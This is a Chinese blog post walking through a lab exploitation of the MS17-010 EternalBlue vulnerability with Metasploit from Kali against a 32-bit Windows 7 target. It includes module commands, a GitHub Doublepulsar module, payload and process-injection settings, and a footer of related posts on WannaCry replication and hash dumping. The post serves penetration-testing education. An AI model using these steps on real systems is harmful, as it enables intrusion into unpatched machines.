linux攻击主机msfconsole,关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑...

最新推荐文章于 2024-08-23 16:56:00 发布

伯索云学堂

最新推荐文章于 2024-08-23 16:56:00 发布

阅读量691

点赞数 1

文章标签： linux攻击主机msfconsole

1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块

攻击机：192.168.148.134 kali linux2017.2 x64

靶机：192.168.148.137 win7 x32

1.1先用msfconsole的smb模块扫描，看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010auxiliary(smb_ms17_010) > set RHOSTS 192.168.148.137 若要范围扫描，则将IP改为 192.168.148.*

存在漏洞！！

1.2使用模块

use exploit/windows/smb/ms17_010_eternalblue

show options

设置目标：

set rhost 192.168.148.137

设置payload等

set lhost 192.168.148.134

set lport 4444run

结果：

这里提示我们架构选择不对，我们再来看看target

这个x64括号是指什么？

不知道，难道是payload设置错了？

这里用了show payloads，发现这里可选择的payload都是64位的，我们的目标机是32位的，所以提示我们架构不对。

这时候，这个msf自带的模块似乎不能用。

2、使用github上的模块

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

2.1复制到ROOT目录，解压

2.2 将Github下载来的eternalblue_doublepulsar.rb，拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。

2.3打开msf，

执行reload_all

2.4调用模块

use exploit/windows/smb/eternalblue_doublepulsar

2.5查看选项

2.6设置

由于目标是win7 32 位，所以target选8(默认)，然后run

2.7run

当执行exploit出现问题该如何解决？

打开多架构支持/安装wine32。wine -h

2.8再次run

又报错，这时候，我们修改注入进程

set processinject explorer.exe

run

注入成功

截屏

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

伯索云学堂

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析

杨秀璋的专栏

03-01

8653

作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒，并实现对Win7文件加密的过程，但过程较为复杂，为什么不直接利用永恒之蓝呢？所以，这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell，再上传勒索病毒进行实验复现，并详细讲解WannaCry勒索病毒的原理。基础性文章，希望对您有所帮助。

[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

杨秀璋的专栏

07-14

544

上一篇文章将详细介绍Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞（CVE-2008-4250）及防御过程，它是Windows Server服务RPC请求缓冲区溢出漏洞，利用445端口，并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。

参与评论您还未登录，请先登录后发表或查看评论

MSF-Linux系统攻防

h1008685的博客

04-06

1069

使用msf对linux服务器ssh协议解析爆破，防止ssh暴力破解解决方案，持久性后门建立，创建计划任务，scp传输文件报错解决

kali linux权限维持,msfconsole权限维持

weixin_42297742的博客

04-29

434

获取管理员hash获得shell后，执行命令getsystem提高权限为管理员权限，接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...

Metasploit基础----msfconsole

最新发布

weixin_53736204的博客

08-23

1095

MSF所⽤功能主要可分为这⼏个模块，每个模块都有各⾃的功能领域，形成了渗透测试的流程模块路径：/usr/share/metasploit-framework/modules/漏洞利⽤(exploit)：/usr/share/metasploit-framework/modules/exploitspayload模块路径：：/usr/share/metasploit-framework/modules/payloads。

msfconsole的Linux下载方法,Metasploit运行msfconsole出现以下问题

weixin_29430629的博客

05-14

808

[-] WARNING! The following modules could not be loaded![-] /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb: SyntaxError /opt/metasploit/msf3/modules/post/windows/gather...

kali 的 msfconsole 使用

weixin_33978016的博客

09-26

1564

第一次使用msfconsole 要先把内建的数据库PostgreSQL开启和metasplote,然后在运行msfconsole开启PostgreSQL: service postgresql start确认开启:ps -e|grep 5432(主要看5432端口有没有开启,postgresql这个服务的默认占用端口是5432) 开启metasploit: servi...

msfconsole的使用,MSF17-010(虚拟机)的实验

weixin_52371314的博客

03-16

1035

宿主机kali:IP地址靶机win7:IP地址然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通.

kali linux验证漏洞,Kali liunx MS17-010漏洞验证

weixin_35714534的博客

05-17

808

MS17-010是一个安全类型的补丁，MS17-010更新修复了 Microsoft Windows中的漏洞。如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息，则其中最严重的漏洞可能允许远程代码执行。于2017年4月14号发出安全公告《Microsoft 安全公告 MS17-010 - 严重》参考链接：https://docs.microsoft...

[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析（二）MS17-010利用及病毒解析

杨秀璋的专栏

04-20

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒，并实现对Win7文件加密的过程，但过程较为复杂，为什么不直接利用永恒之蓝呢？所以，这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell，再上传勒索病毒进行实验复现，并详细讲解WannaCry勒索病毒的原理。基础性文章，希望对您有所帮助。

[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

杨秀璋的专栏

12-28

9635

系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等，通过在线笔记和实践操作的形式分享与博友们学习，希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞（CVE-2008-4250），它是Windows Server服务RPC请求缓冲区溢出漏洞，利用445端口，并通过Metasploit工具获取shell及进行深入的操作。

kali msfconsole命令详解以及靶机攻破实战

weixin_31501115的博客

09-09

9397

msfconsole靶机攻破实战，简称msf是一款常用的渗透测试工具，包含了常见的漏洞利用模块和生成各种渗透文件，利用网站，手机等的漏洞将到目标靶机，操控目标靶机…这边仅供学习使用msfconsole注：默认kali 预装了metasploit-framework，即msfconsole命令，如果没有或提示：-p, –payload < payload > 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的。

网络空间安全-Kali Msfconsole-FTP笑脸漏洞:)介绍、渗透测试、使用

彪哥.TOP的博客

05-22

983

FTP笑脸漏洞，特别是与vsftpd 2.3.4版本相关的，是一个严重的安全漏洞，最初于2011年被公开发现。这个漏洞允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。具体来说，当连接带有vsftpd 2.3.4版本的服务器的21端口时，如果在用户名中输入带有“:)”的字符串（即笑脸表情的ASCII码表示），密码可以任意输入，即可触发该漏洞。

漏洞利用一：MSF 漏洞验证专题

ZY95001的博客

09-04

3363

一、MSF介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称MSF。是一个免费、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。兼有windows与linux两种版本。二、相关专业术语 1.渗透攻击(Exploit)：...

kali php调试,Msfconsole使用总结

weixin_32085599的博客

03-23

352

MSFVENOM常规选项1.–p (- -payload-options)添加载荷payload。载荷这个东西比较多，这个软件就是根据对应的载荷payload生成对应平台下的后门，所以只有选对payload，再填写正确自己的IP，PORT就可以生成对应语言，对应平台的后门了！！！(- -payload-options 列出payload选项)2 –l查看所有payload encoder nops...

解决Kali2020.1启动msfconsole失败问题

weixin_46119529的博客

07-30

2470

msfconsole启动失败，如下图先用gem查看需要安装1.17.3版本的bundler 安装完成如下 msfconsole启动msf，发现如下警告查看postgresql的状态是开启的，如果没开启用service postgresql start开启输入msfconsole进入msf，输入msfdb init 再次进入，完美启动！！ ...

Linux-Metasploit 渗透-魔鬼教程

m0_74025111的博客

04-20

2998

这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞，换句话来说，渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告，并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的，专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号） -sV 扫描服务器版本。

40.网络安全渗透测试—[穷举篇3]—[KALI的Metasploit穷举模块的使用]

qwsn

08-06

2539

最详细利用kali的msf进行CVE-2019-0708漏洞复现